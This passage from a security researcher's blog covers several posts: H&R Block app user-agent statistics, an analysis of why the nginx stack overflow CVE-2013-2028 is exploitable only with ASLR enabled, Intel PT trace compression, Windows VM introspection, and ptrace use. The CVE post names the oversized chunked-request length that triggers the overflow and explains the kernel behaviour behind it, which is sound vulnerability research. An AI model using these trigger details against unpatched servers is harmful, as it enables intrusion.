HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla

With a quick search, I figured out that MyBlock is a mobile app offered by H&R Block. More interesting though is the juicy information H&R Block decided to embed in these user-agent strings. As we can see, they contain the name of the app, the version number, the OS (iOS or Android), the device form factor (phone or tablet), and in the case of iOS, it even mentions if TouchID or FaceID was used. As a security researcher, I'm particularly interested in this last tidbit because people use H&R Block to file taxes and these user-agents started appearing January 7, 2018 (i.e., tax season). So how many people use the various authentication methods offered by Apple to protect their tax filing app? Let's find out!

The following is a small Python script I wrote to filter the data. The parsing and filtering leaves much to be desired, but I didn't want to spend too much time on such a simple task:

#!/usr/bin/env python
import sys
import json

def parse_subtokens(tokens):
    """ Parses subtokens and returns a dictionary. If invalid, None is returned.

    We expect Android user agents to be in the form of:
        HRB MOBILE ANDROID [PHONE|TABLET] MYBLOCK [VERSION] <BROWSER>
    and iOS user agents to be in the form of:
        HRB MOBILE IOS [PHONE|TABLET] MYBLOCK <TOUCHID|FACEID> [VERSION] [BROWSER]
    """
    res = {}

    if tokens[0] != 'HRB':
        return None

    if tokens[1] != 'MOBILE':
        return None

    if tokens[2] != 'ANDROID' and tokens[2] != 'IOS':
        return None
    res['OS'] = tokens[2]

    if tokens[3] != 'PHONE' and tokens[3] != 'TABLET':
        return None
    res['DEVICE'] = tokens[3]

    if tokens[4] != 'MYBLOCK':
        return None
    res['APP'] = tokens[4]

    if tokens[2] == 'ANDROID':
        if len(tokens[5:]) == 1:
            res['BROWSER'] = 'N/A'
            res['VERSION'] = tokens[-1]
            res['AUTH'] = 'N/A'
        elif len(tokens[5:]) == 2:
            res['BROWSER'] = tokens[-1]
            res['VERSION'] = tokens[-2]
            res['AUTH'] = 'N/A'
        else:
            return None

    if tokens[2] == 'IOS':
        if len(tokens[5:]) == 2:
            res['BROWSER'] = tokens[-1]
            res['VERSION'] = tokens[-2]
            res['AUTH'] = 'N/A'
        elif len(tokens[5:]) == 3:
            res['BROWSER'] = tokens[-1]
            res['VERSION'] = tokens[-2]
            res['AUTH'] = tokens[-3]
        else:
            return None

    # Cleanups:
    #     1) Some versions of the Android app prefix 'v' onto version

    if res['VERSION'][0] == 'v':
        res['VERSION'] = res['VERSION'][1:]

    assert len(res) == 6
    return res

def is_hrb(year, filter, line):
    """ Validate that a line should be parsed and added to the buckets.

    Specifically, entry should contain the right year, be a HRB user-agent,
    and contain the filter keyword if one was provided.
    """
    if line[:4] != year:
        return False
    if line[11:14] != 'HRB':
        return False
    if filter is not None and filter not in line:
        return False
    return True

if __name__ == '__main__':

    if len(sys.argv) < 3:
        # The filter argument is optional; exit non-zero on bad usage
        print 'Usage:', sys.argv[0], '<tax-year>', '[filter]', '<filepath>'
        sys.exit(1)

    if len(sys.argv) == 3:
        filter = None
    else:
        filter = sys.argv[2]

    with open(sys.argv[-1], 'r') as ifile:
        data = [line.strip() for line in ifile if is_hrb(sys.argv[1], filter, line)]

    buckets = {
        'OS': {
            'IOS':     0,
            'ANDROID': 0,
        },
        'DEVICE': {
            'PHONE':   0,
            'TABLET':  0,
        },
        'APP': {
            'MYBLOCK': 0,
        },
        'AUTH': {
            'TOUCHID': 0,
            'FACEID':  0,
            'N/A':     0,
        },
        'VERSION': {},
        'BROWSER': {},
    }

    for line in data:
        tokens = line.split(',')
        if len(tokens) != 3:
            print 'WARNING: Cannot tokenize:', line
            continue

        subtokens = parse_subtokens(tokens[1].split('-'))
        if subtokens is None:
            print 'WARNING: Cannot subtokenize:', tokens[1].split('-')
            continue

        try:
            count = int(tokens[-1])
        except ValueError:
            print 'WARNING: Could not parse count from:', line
            continue

        buckets['OS'][subtokens['OS']]         += count
        buckets['DEVICE'][subtokens['DEVICE']] += count
        buckets['APP'][subtokens['APP']]       += count
        buckets['AUTH'][subtokens['AUTH']]     += count

        if subtokens['VERSION'] in buckets['VERSION']:
            buckets['VERSION'][subtokens['VERSION']] += count
        else:
            buckets['VERSION'][subtokens['VERSION']] = count

        if subtokens['BROWSER'] in buckets['BROWSER']:
            buckets['BROWSER'][subtokens['BROWSER']] += count
        else:
            buckets['BROWSER'][subtokens['BROWSER']] = count

    print json.dumps(buckets, indent=4)

Results

So here's what I uncovered, listed in no particular order:

From January 7 through February 8, 232,248 requests were made by MyBlock apps.
230,226 requests were made from phones while 2,022 were made from tablets; over 99% of the requests came from phones.
0 requests were made by Android tablets.
Over 99% of requests were made by devices running iOS.
Two versions of the app appear in the dataset: 6.0.0 and 6.1.0.
Version 6.1.0 makes up over 99% of the requests.
The first requests made by version 6.1.0 occurred on January 13; 6 days after the first 6.0.0 request.
100% of requests from Android devices were version 6.1.0.
The requests made from Android devices contain no information about authentication method or browser.
100% of requests from iOS contain "Mozilla" in the user-agent.

And finally, the observations relevant to my question:

170,816 requests used TouchID, 15,323 FaceID, and 45,867 showed neither keyword; 74%, 7%, and 19%, respectively.
0% of requests for version 6.0.0 on iOS used FaceID.

Discussion

For the requests from iOS devices that didn't mention an authentication method in their user-agent, I assume the user typed in a password or pin, though I haven't confirmed this. I also haven't looked into why all the iOS requests have "Mozilla" at the end of their user-agent. It's probably related to the browser framework used by the MyBlock app.

Judging by the fact that no requests from version 6.0.0 of the app used FaceID, it's possible that this feature wasn't implemented until 6.1.0, though this is just speculation.

Most interestingly, users appear to be comfortable with using Apple's TouchID to protect their MyBlock app. Even more interesting is that people are comfortable with using FaceID, considering that this feature is relatively new. It appears that in mobile computing, biometric authentication is a widely accepted trend.

It's also worth mentioning that while MyBlock doesn't appear to have been available during the 2017 tax season, another H&R Block app does appear:

HRB-MOBILE-IOS-PHONE-TAXES-6.4-Mozilla

This app seems to have two versions, 6.4 and 6.3, but the total number of requests is very low: only a few thousand. Another interesting finding is 13 requests made on April 26, 2017 with this user-agent:

HRB-MOBILE-IOS-PHONE-TAXES-nil-Mozilla

Perhaps this was a test version of the app?

Future Work

We still have 2 months to go in this year's tax season, so I'll be interested to check the numbers once the season closes. I'm also interested to see how many people continue to use this app outside of the tax season and how these results will change in 2019.

How ASLR Helps Enable Exploits (CVE-2013-2028)

2017-12-16T11:30:00-05:00

The other day I was playing around with CVE-2013-2028 along with my peer Hong Hu when we came across something odd: CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is enabled. After confirming this observation multiple times, we were left very surprised. How could ASLR possibly worsen the security of an application? Driven by curiosity, we decided to find the root cause of this result. Ultimately, we had to go all the way to the Linux kernel code to find our answer. What we found was a kernel quirk that can't really be called a bug from the kernel's perspective, but does go against the expectations of the user. So without further ado, allow me to share how ASLR can enable the exploitation of applications.

For those unfamiliar with CVE-2013-2028, all that needs to be known is that it's an exploitable vulnerability in older versions of nginx stemming from a stack buffer overflow that can be triggered by specially crafted HTTP requests. The bug occurs because an integer provided to nginx by the user that is intended to be an unsigned value is accidentally cast temporarily into a signed value. If an attacker passes a sufficiently large value, the worker thread handling the request will copy too much data from its network socket into a fixed-size buffer, causing the stack to get smashed. For the curious reader, a more in-depth analysis is available here and a repository for reproducing it is available here.
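The signed/unsigned confusion is easy to reproduce outside of nginx. The following Python sketch is not nginx's code; it only mimics the pattern described above. The 4096-byte buffer size and the helper names (as_signed64, as_unsigned64, bytes_to_read) are assumptions made up for illustration:

```python
BUFFER_SIZE = 4096       # hypothetical fixed-size stack buffer
MASK64 = (1 << 64) - 1


def as_signed64(value):
    """Reinterpret a 64-bit unsigned integer as signed (two's complement)."""
    value &= MASK64
    return value - (1 << 64) if value >= (1 << 63) else value


def as_unsigned64(value):
    """Reinterpret a 64-bit signed integer as unsigned."""
    return value & MASK64


def bytes_to_read(claimed_length):
    """Mimic the flawed check: compare as signed, then use as unsigned."""
    signed_length = as_signed64(claimed_length)
    chosen = min(signed_length, BUFFER_SIZE)  # a negative length always "wins"
    return as_unsigned64(chosen)


print(hex(bytes_to_read(100)))                 # small request: unchanged
print(hex(bytes_to_read(10000)))               # large request: limited to the buffer
print(hex(bytes_to_read(0xaaaaaaaaaaaaaaaa)))  # huge request: slips past the limit
```

The first two calls behave as intended. The third value is negative when viewed as signed, so it is smaller than the buffer size and passes the check, yet it is enormous once it is treated as unsigned again.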

So why is this bug only exploitable when ASLR is turned on? We can find the user space answer with a simple strace. If we make a chunked HTTP request and claim the total size is going to be 0xaaaaaaaaaaaaaaaa, nginx's worker will make a recvfrom() system call for 0xaaaaaaaaaaaaaab0 bytes from the network socket. When ASLR is turned on, the Linux kernel will copy our request (which is not actually 0xaaaaaaaaaaaaaaaa bytes long) into the worker's buffer, smashing the stack. However, when ASLR is turned off, the kernel will return -EFAULT and the worker will safely report the error and close the session.

We could stop here, but Hong and I were not satisfied. Why is the kernel returning -EFAULT when ASLR is disabled but not when it is enabled? The space allocated for the stack is the same in both cases, so that can't be the problem. The only obvious difference is ASLR moves the stack's address range to randomize it. When ASLR is disabled, the stack's highest address is placed at the boundary between user and kernel space, which is 0x7fffffffffff in Linux kernels compiled for x86_64. However, 0xaaaaaaaaaaaaaab0 is such a large number it shouldn't matter where the stack is placed. It's not going to fit into the memory segment and it's going to cross the boundary. So what's really happening in the kernel when it handles a recvfrom() system call?

Taking a look at Linux's implementation of recvfrom(), we see the following code:

SYSCALL_DEFINE6(recvfrom, int, fd, void __user *, ubuf, size_t, size,
                unsigned int, flags, struct sockaddr __user *, addr,
                int __user *, addr_len)
{
    struct socket *sock;
    struct iovec iov;
    struct msghdr msg;
    struct sockaddr_storage address;
    int err, err2;
    int fput_needed;

    err = import_single_range(READ, ubuf, size, &iov, &msg.msg_iter);
    if (unlikely(err))
        return err;
    sock = sockfd_lookup_light(fd, &err, &fput_needed);
    if (!sock)
        goto out;

    msg.msg_control = NULL;
    msg.msg_controllen = 0;
    /* Save some cycles and don't copy the address if not needed */
    msg.msg_name = addr ? (struct sockaddr *)&address : NULL;
    /* We assume all kernel code knows the size of sockaddr_storage */
    msg.msg_namelen = 0;
    msg.msg_iocb = NULL;
    if (sock->file->f_flags & O_NONBLOCK)
        flags |= MSG_DONTWAIT;
    err = sock_recvmsg(sock, &msg, flags);

    if (err >= 0 && addr != NULL) {
        err2 = move_addr_to_user(&address,
                                 msg.msg_namelen, addr, addr_len);
        if (err2 < 0)
            err = err2;
    }

    fput_light(sock->file, fput_needed);
out:
    return err;
}

This code performs two relevant checks. The first occurs in:

err = import_single_range(READ, ubuf, size, &iov, &msg.msg_iter);

And the second occurs in:

err2 = move_addr_to_user(&address, msg.msg_namelen, addr, addr_len);

However, we can rule out move_addr_to_user() because it's passed the number of bytes actually fetched from the socket, which is the same in our attack regardless of ASLR. This leaves import_single_range(), which is implemented as follows:

int import_single_range(int rw, void __user *buf, size_t len,
                        struct iovec *iov, struct iov_iter *i)
{
    if (len > MAX_RW_COUNT)
        len = MAX_RW_COUNT;
    if (unlikely(!access_ok(!rw, buf, len)))
        return -EFAULT;

    iov->iov_base = buf;
    iov->iov_len = len;
    iov_iter_init(i, rw, iov, 1, len);
    return 0;
}
EXPORT_SYMBOL(import_single_range);

In this function, a sanity check is performed via access_ok() to make sure the number of bytes requested by the caller cannot cause a write that would cross into kernel space. But as we pointed out before, the value nginx's worker is passing here is 0xaaaaaaaaaaaaaab0, which should easily cross the boundary regardless of ASLR. The type size_t is defined as an unsigned 64-bit integer in our case, so access_ok() should be passed 0xaaaaaaaaaaaaaab0, right? Actually, if we look more closely, we can see the following lines enforce a limit on len:

if (len > MAX_RW_COUNT)
    len = MAX_RW_COUNT;

If we look up MAX_RW_COUNT, we can see it equals (INT_MAX & PAGE_MASK), which fits in 32 bits (0x7ffff000 with 4 KiB pages). So in other words, even though recvfrom() allows 64-bit unsigned integer lengths on x86_64, import_single_range() silently cuts them down to at most this 32-bit value! On a 64-bit processor, this truncation combined with ASLR's relocation of the stack allows our attack to pass the access_ok() check and smash nginx's stack.

Technically, this isn't a bug from the kernel's perspective because import_single_range() also calls iov_iter_init() with the truncated length. This means recvfrom() can only receive up to the truncated length worth of bytes from the socket and therefore passing the truncated value to access_ok() is safe.
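To make the interaction between the length limit and the stack's location concrete, here is a simplified Python model of the check. It is a sketch, not kernel code: access_ok() is reduced to a single range comparison, 4 KiB pages are assumed, and both stack buffer addresses are hypothetical values I picked to sit near and far from the user space boundary:

```python
PAGE_SIZE = 4096                    # assuming 4 KiB pages
PAGE_MASK = ~(PAGE_SIZE - 1)
INT_MAX = 2**31 - 1
MAX_RW_COUNT = INT_MAX & PAGE_MASK  # 0x7ffff000
USER_SPACE_END = 0x7fffffffffff     # boundary quoted earlier in this post
EFAULT = 14


def access_ok(buf, length):
    """Simplified stand-in: the whole range must stay inside user space."""
    return buf + length <= USER_SPACE_END + 1


def import_single_range(buf, length):
    """Mirror the limit-then-check order of the kernel function."""
    length = min(length, MAX_RW_COUNT)
    if not access_ok(buf, length):
        return -EFAULT
    return 0


REQUESTED = 0xaaaaaaaaaaaaaab0
STACK_BUF_NO_ASLR = 0x7fffffffd000  # hypothetical: just below the boundary
STACK_BUF_ASLR = 0x7ffc00000000     # hypothetical: randomized several GiB lower

print(import_single_range(STACK_BUF_NO_ASLR, REQUESTED))  # -14 (EFAULT)
print(import_single_range(STACK_BUF_ASLR, REQUESTED))     # 0 (check passes)
```

In this model the limited length is just under 2 GiB, so the check fails only when the buffer sits within that distance of the boundary. Once randomization moves the stack further down, the same oversized request passes.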

That said, it's a really odd way of implementing this system call. From the caller's perspective, it's not made clear that even though it can pass a 64-bit length, anything larger than MAX_RW_COUNT is silently reduced to a 32-bit value. Also, recvfrom() treats the length as 64 bits all the way through its own logic, so it's not immediately obvious that the length is being truncated by MAX_RW_COUNT. Additionally, as Hong and I discovered, there is a security consequence to this choice. Performing the access_ok() check on the truncated length allows network attacks that rely on integer overflow and underflow to succeed where they would otherwise more likely be blocked by the kernel due to a failed system call. We find this to be an interesting consequence since it results from seemingly unrelated design decisions. It is hard to recommend that the Linux kernel developers revise import_single_range() given that the real problem is a bug in nginx and not the Linux kernel itself, but we find this discovery fascinating regardless.

Intel PT Data at Rest: A Compression Experiment

2017-10-28T10:30:00-04:00

Full Disclosure: I am a researcher in Georgia Tech's ISTC-ARSA, which is funded by Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as authors, I am neither associated with them nor Microsoft Research at the time of writing.

Intel Processor Trace (PT) is a powerful hardware feature for recording the behavior of CPUs. With it, developers and researchers can monitor the control-flow path taken by threads, hardware interrupts, and more, all with cycle-accurate timing. However, this rich stream of data comes at the cost of size. Depending on what PT is configured to trace, it can output hundreds of megabytes of data per second per core. PT does take steps to save bandwidth by only recording changes in control-flow, excluding redundant high-order bits in target addresses, and compressing returns leading to predictable locations. However, despite this compression, the volume of data is still massive.

As a consequence, much of the work published so far handles tracing in one of two ways. One option is to consume the trace as it is generated. This works as long as the consumer can keep up with the producer, which is the case in the control-flow integrity (CFI) system Griffin. The other common approach is to configure PT to write in a circular buffer. This option is suitable for crash dump analysis systems like Snorlax, which only need a fixed size window into a thread's past.

However, while some applications are feasible using the two previous methods, there are still situations where it is desirable to store the entire trace for postmortem analysis. If nothing else, it is useful for repeatable experiments. With this in mind, I performed a naive experiment last night to explore if more can be done to compress PT traces when the data is at rest. Based on the observations that the compression PT applies is highly localized (i.e., a target address versus the previously recorded target address and a return versus the previously recorded call) and that programs often execute repetitive loops, I hypothesized that even a general purpose compression algorithm should be able to compress traces with a good ratio.

Procedure

The overall idea for the experiment is very simple: gather some PT traces, compress them with a commonly used algorithm, and compare the sizes. For a subject I used the simple HTTP server that comes with Python 2.7 to host a copy of this blog. For each trial I had a crawler request pages from the server for a set duration. Once the time expired, I terminated the server and crawler and stopped the tracing. I then compressed the trace using the GNU/Linux utility gzip, which uses Lempel-Ziv coding. I also fed it through a disassembler that matches the PT packets to the binary's static code to produce a linear sequence of instructions. From this I counted the number of unique basic blocks executed during the trace to serve as a rough proxy for code coverage. To summarize the procedure:

Configure and enable PT tracing.
Start the Python HTTP server.
Start the crawler.
Wait for a specified duration.
Terminate the crawler and server.
Stop PT tracing.
Compress the resulting trace and count the number of unique basic blocks executed.
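The compression step of this procedure can be sketched in a few lines of Python. This is not the tooling I used for the experiment (that was the gzip command line utility); it uses Python's gzip module instead, and the "trace" here is a made-up repetitive byte pattern standing in for real PT packets:

```python
import gzip
import os
import tempfile


def space_savings(path):
    """Return (original_size, compressed_size, savings) for one file."""
    with open(path, "rb") as f:
        raw = f.read()
    compressed = gzip.compress(raw)
    savings = 1.0 - len(compressed) / len(raw)
    return len(raw), len(compressed), savings


# Stand-in for a trace file: a repetitive pattern, not real PT data.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(bytes(range(64)) * 4096)
    trace_path = tmp.name

original, compressed, savings = space_savings(trace_path)
os.remove(trace_path)
print(f"{original} -> {compressed} bytes ({savings:.1%} saved)")
```

Reading the whole file into memory is fine for a toy input, but for multi-gigabyte traces a streaming approach would be the better choice. The savings value is the same space savings percentage used when comparing compressed and uncompressed sizes.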

Results

Comparing the original size of the PT trace to the size after compression produces the above graph. Both plots best match linear regressions and are increasing over time. However, the size of the compressed traces increases at a slower rate than the uncompressed traces, meaning these two plots are diverging as time increases.

Another observation to note is the large volume of trace data produced during the server's startup. This explains why even the shortest trial produced a 1GB trace. For the same reason, counting the number of unique basic blocks turned out to not be useful. The number of new basic blocks executed while serving requests was small.

The next graph shows the relationship between the compressed and uncompressed sizes as a space savings percentage. The plot best fits a linear regression and shows the savings decreasing over time. This is likely due to the design of the underlying compression algorithm, which is intended for general use and does not take into consideration the unique characteristics of PT traces.

To summarize, this experiment shows that more can be done to compress PT traces for storage at rest.

Discussion

It is understandable that the compression used by PT would produce small space savings compared to general compression algorithms given the limitations of hardware memory and Intel's very strict performance overhead requirements. In practice, PT produces an overhead of less than 4% in the worst case, and less than 2% on average. These numbers are based on my own observations and the results published by other researchers. In short, PT has very few clock cycles and very little space available for performing compression.

Another factor that deserves consideration is compression's impact on processing time. For systems that consume PT traces on the fly, the largest source of performance overhead is not PT tracing itself but rather the time spent buffering and consuming it. In CFI, for example, the PT trace has to be matched with the executed code in order to reconstruct control-flow. This is why the authors of Griffin report an 11.9% overhead on the SPECint benchmark despite the 4% overhead of PT itself. Adding better space saving compression could increase this overhead further.

That said, for storing PT traces at rest, more can be done to better conserve space.

Windows _EX_FAST_REF Pointers and Virtual Machine Introspection

2017-08-29T23:00:00-04:00

Last week I was working on a VMI-based malware unpacker for Linux and Windows when I came across an interesting problem. I was trying to implement a method that would, given a virtual address and process ID, return the address range of the memory segment it belongs to using VMI.

Implementing this in Linux was no problem for me because it's the OS I'm most familiar with. The implementation boils down to getting the current process' task_struct, looking up the pointer to its memory mapping (task_struct->mm), and then iterating through its linked list of virtual memory areas (mm->mmap) until a match is found. Pretty straightforward.

Windows seemed a little trickier but very similar. The main difference is that while Linux uses a linked list of structures called virtual memory areas, Windows uses structures called virtual address descriptors (VADs) linked into a balanced binary tree. The procedure is fairly similar. Once the current executive process (_EPROCESS) is located in memory, read its VadRoot pointer, which, as the name implies, points to the root of the binary tree of VADs, and then check the VAD's memory range. Look up the left child if the range is too high, the right child if the range is too low, and repeat until the desired VAD is located. A straightforward binary search.
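The search itself can be sketched without any VMI at all. In the following Python model, the Vad class and its fields are simplified stand-ins that I invented for illustration (real VADs are kernel structures read out of guest memory), but the descent logic is the one described above:

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Vad:
    """Simplified stand-in for a VAD node covering [start, end]."""
    start: int
    end: int
    left: Optional["Vad"] = None
    right: Optional["Vad"] = None


def find_vad(root, address):
    """Descend the tree until a node's range contains the address."""
    node = root
    while node is not None:
        if address < node.start:    # node's range is too high: go left
            node = node.left
        elif address > node.end:    # node's range is too low: go right
            node = node.right
        else:
            return node
    return None                     # address is not mapped


tree = Vad(0x400000, 0x4fffff,
           left=Vad(0x10000, 0x1ffff),
           right=Vad(0x7ff00000, 0x7ff0ffff))

match = find_vad(tree, 0x7ff01234)
print(hex(match.start), hex(match.end))
print(find_vad(tree, 0x300000))
```

In a real VMI tool, each step to a child node would be a read of guest memory rather than an attribute access.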

So I implemented my VMI function, ran it, and to my surprise it failed. After some debugging, I discovered that when the code read VadRoot, the pointer would always be 3 bytes greater than the actual base virtual address of the root VAD. Here are some examples of addresses that my code read for 64-bit Windows 7, printed in little-endian:

1b 3c 90 02 80 fa ff ff
6b 3d 6a 02 80 fa ff ff
3b 69 8e 01 80 fa ff ff

Why are the 4 least significant bits always 0xb and why was I only having this problem with the VadRoot pointer and no other pointers? Stumped, I posted my question to the libVMI forum and the developer of DRAKVUF kindly pointed out the answer: the Windows kernel sometimes uses a special pointer called an _EX_FAST_REF.

If you take a look at the definition for this type, you will notice something interesting:

typedef struct _EX_FAST_REF
{
    union
    {
        PVOID Object;
        ULONG RefCnt: 3;
        ULONG Value;
    };
} EX_FAST_REF, *PEX_FAST_REF;

As you can see, the Windows kernel uses the 3 least significant bits as a reference counter. Therefore, in order to read this pointer correctly using VMI, these bits need to be masked out after reading the pointer. Once I realized such a pointer existed, the rest of the implementation was straightforward.
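As a minimal sketch of that masking step, the Python below decodes the first of the raw values listed earlier and separates the pointer from the counter. The function name decode_fast_ref and its refcnt_bits parameter are my own invention; the default of 3 follows the definition shown above, and the width is worth checking against the structure definition for the exact Windows build being inspected:

```python
def decode_fast_ref(raw_bytes, refcnt_bits=3):
    """Split a little-endian fast reference into (pointer, reference count)."""
    value = int.from_bytes(raw_bytes, "little")
    mask = (1 << refcnt_bits) - 1
    return value & ~mask, value & mask


# First example value from the debugging output, as it appeared in memory.
raw = bytes.fromhex("1b 3c 90 02 80 fa ff ff")
pointer, refcnt = decode_fast_ref(raw)
print(hex(pointer), refcnt)
```

Keeping the width as a parameter means the same helper works if the bit field turns out to be wider on a given target.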

So there you have it. The Windows kernel sometimes uses a special pointer that stashes a reference counter in the lower bits. Something to watch out for when you're doing virtual machine introspection. Hopefully this blog post will save others some time.

You never know where your code will end up.

2017-07-28T16:30:00-04:00

I was searching through an archive site for 4Chan when I noticed that my name was in a random post on the Technology board, /g/:

Anonymous Sat Jun 17 11:13:54 2017 No.60943336

>>60943289
I'm running it locally, but you can get it here:
https://github.com/carter-yagemann/4ChanBBS
It uses the official API to retrieve posts, and it even converts images to ASCII

The link is for a public repository I created on GitHub. It contains a proxy server written in Python that allows computers to browse 4Chan via a telnet connection using a command line interface (CLI) reminiscent of old-school BBS sites. I wrote it in a few hours purely as a joke and then never touched it again. Everything about it was intended as nothing more than a quick laugh, down to how it crudely converts images into ASCII strings so they can be displayed in the terminal. I didn't put much effort into the project and I assumed no one would ever care.

But apparently someone did care and that someone owns a retro computer:

Seeing my code's banner page on a monitor old enough to be from the days of BBS made my day. I don't know the person that posted this image, but I'm happy to know someone found value in my forgotten code. It just goes to show that you never know where your code will end up.

Intel Processor Trace, execvp, and ptrace

2017-03-21T21:15:00-04:00

Lately, I've been playing around with Intel Processor Trace (PT), an x86 hardware feature that allows for complete tracing of process control flows. As part of my research, I've been developing my own Linux driver and user program to control PT.

Tracing can be configured using a handful of model-specific registers (MSRs) in the Intel CPU. One useful configuration supported by PT is CR3 filtering. For those readers less familiar with x86 architecture, when a user process is executed, the CPU's CR3 register holds the physical address of the process's page table. Since every process has its own page table, each process will also have a CR3 value that is distinct from that of every other currently scheduled process. By configuring PT to use a CR3 filter, tracing can be limited to a single process.

Early versions of my program could only trace already running processes. I would use the GNU debugger to start the target process and trap its first instruction, and then manually feed its PID into my program as an argument. The Linux driver would then convert the PID into a CR3 value by traversing the process's task structure (virt_to_phys(task_struct->mm->pgd)) and use this address to configure PT (IA32_RTIT_CR3_MATCH). Needless to say, having to manually start and trap the target process got very tiring after repeated tracing.

To simplify tracing a process, I wanted my program to take as parameters the file path of an executable and its arguments and automatically start and trace the process. My first attempt roughly followed this pseudo code:

pid = fork();

if (pid == 0) { // Child process

    // Wait for parent to signal that PT is ready
    execvp(target_program, args);

} else {        // Parent process

    enable_cr3_filter(pid);
    enable_pt();
    // Signal child that PT is ready
}

Easy enough, right? I compiled the program, ran my first trace and got... nothing.

execvp and CR3

So what went wrong? It turns out we can demonstrate the problem with a simple test. Consider this simple C program:

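// test_1.c
#include <stdio.h>
#include <unistd.h>

// Write our own PID to the character device; the driver logs the CR3.
void pid_to_cr3(void) {

    int m_pid = getpid();
    char pid_str[20];
    snprintf(pid_str, sizeof(pid_str), "%d", m_pid);

    FILE *chardev = fopen("/dev/pid_to_cr3", "w");

    if (chardev == NULL) {
        perror("fopen");
        return;
    }

    fputs(pid_str, chardev);
    fclose(chardev);
}

int main(void) {

    char *argv[] = {"./test_2", NULL};

    pid_t pid = fork();

    if (pid == 0) {      // Child process

        pid_to_cr3();    // printed to dmesg
        execvp(argv[0], argv);
        perror("execvp"); // only reached if execvp fails
        return 1;
    }

    return 0;
}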

In this example, /dev/pid_to_cr3 is a simple Linux character device: a process writes a PID into it, and the driver prints the corresponding CR3 value to the kernel log:

// pid_to_cr3.c
static unsigned long pid_to_cr3(int pid) {

    struct task_struct *task;
    struct mm_struct *mm;
    void *cr3_virt;

    task = pid_task(find_vpid(pid), PIDTYPE_PID);

    if (task == NULL)
        return 0;

    mm = task->mm;

    // mm can be NULL in cases such as kthreads, in which case we want the active_mm
    if (mm == NULL)
        mm = task->active_mm;

    if (mm == NULL)
        return 0;

    cr3_virt = (void *) mm->pgd;
    return virt_to_phys(cr3_virt);
}

After test_1 passes its PID to /dev/pid_to_cr3, it uses execvp to replace its memory image with a new program, test_2. This program simply passes its PID to /dev/pid_to_cr3 as well:

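// test_2.c
#include <stdio.h>
#include <unistd.h>

// Write our own PID to the character device; the driver logs the CR3.
void pid_to_cr3(void) {

    int m_pid = getpid();
    char pid_str[20];
    snprintf(pid_str, sizeof(pid_str), "%d", m_pid);

    FILE *chardev = fopen("/dev/pid_to_cr3", "w");

    if (chardev == NULL) {
        perror("fopen");
        return;
    }

    fputs(pid_str, chardev);
    fclose(chardev);
}

int main(void) {

    pid_to_cr3();    // printed to dmesg
    return 0;
}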

If we compile these source files and execute test_1, we expect that the PID before and after executing execvp will be the same because execvp causes the kernel to overwrite the caller's own memory. But what happens to the CR3 value? As it turns out:

[ 1757.437572] PID 17319 = CR3 18759503872
[ 1757.438414] PID 17319 = CR3 18826612736

Rather than rewriting the existing caller's page table when execvp is called, the Linux kernel actually allocates and populates an entirely new page table! Since our original PT program was getting the CR3 before the execvp, our trace wasn't including the target program's execution.

ptrace

So how do we get the CR3 value after execvp is called by the child? We can't simply have the parent signal the child, like in the first attempt, because any code we give to the child process will be overwritten when execvp is called. The solution instead lies in an OS feature known as ptrace. Using ptrace, we can have the child process ask to be traced by its parent. When execvp completes, the OS will pause the child and notify the parent. The parent can catch this notification using waitpid(), do whatever it needs to do, and then resume the child. The code looks something like this:

pid = fork();

if (pid == 0) { // Child process

    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    execvp(args[0], args);

} else {        // Parent process

    waitpid(pid, NULL, 0); // Wait for child to complete execvp()

    enable_cr3_filter(pid);
    enable_pt();

    ptrace(PTRACE_DETACH, pid, 0, 0); // Resume child

}
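
For readers who want something they can compile, the following is a fuller sketch of the same sequence with error handling added. The function names spawn_stopped_at_exec() and detach_and_wait() are made up for this example, and the PT setup itself is left out: it would run between the two calls, while the child is stopped.

```c
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork, exec argv[0] under ptrace, and return once the child is stopped
 * right after a successful execvp(). Returns the child's PID, or -1. */
pid_t spawn_stopped_at_exec(char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: ask to be traced by the parent, then exec the target. */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(127);
        execvp(argv[0], argv);
        _exit(127); /* only reached if execvp() failed */
    }

    /* Parent: block until the child stops or exits. */
    if (waitpid(pid, &status, 0) != pid)
        return -1;

    if (!WIFSTOPPED(status))
        return -1; /* child exited (and was reaped): exec failed */

    if (WSTOPSIG(status) != SIGTRAP) {
        /* Stopped for some other reason; give up on this child. */
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return -1;
    }

    return pid; /* new page table exists now; safe to look up CR3 */
}

/* Detach so the child resumes, then wait for it to finish.
 * Returns the child's exit code, or -1 on error or abnormal exit. */
int detach_and_wait(pid_t pid)
{
    int status;

    if (ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1)
        return -1;
    if (waitpid(pid, &status, 0) != pid)
        return -1;

    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Checking WIFSTOPPED() matters because waitpid() also returns when the child dies, for example when execvp() cannot find the program. Without the check, the parent would go on to configure PT for a process that no longer exists.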

Note that this code detaches the parent from the child once PT has been configured, which causes the child to resume normal execution. If we wanted to continue monitoring the child (for example, to detect fork() or clone()), we could instead stay attached and resume it with PTRACE_CONT.

Making the above modification allows the parent to capture the correct CR3 value and get a complete PT trace.

Of Fancy Bears and Men: Attribution in Cybersecurity

2017-03-09T22:30:00-05:00

I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP) on the topic of attack attribution. You can read the post here: http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/

Getting the CR3 value for a PID in Linux

2017-01-30T20:30:00-05:00

Writing low-level code can be difficult due to the lack of examples on the internet. The answer is generally sitting somewhere in a 3,000-page manual where only the most dedicated programmers will find it.

